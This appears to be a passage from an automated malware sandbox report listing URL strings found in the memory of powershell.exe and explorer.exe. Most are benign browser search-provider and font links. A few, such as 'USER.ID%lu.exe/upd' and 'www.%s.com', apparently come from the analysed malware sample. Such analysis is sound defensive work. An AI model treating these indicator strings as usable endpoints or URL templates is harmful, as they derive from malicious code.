            Source: powershell.exe, 00000018.00000003.882846219.000001B4AFAF2000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: powershell.exe, 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 00000018.00000002.951922718.000001B4A76E3000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 00000018.00000002.926947310.000001B497891000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 00000018.00000002.926126421.000001B497681000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000020.00000000.894651388.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000018.00000002.926947310.000001B497891000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000020.00000000.908964603.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 00000020.00000000.911186934.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
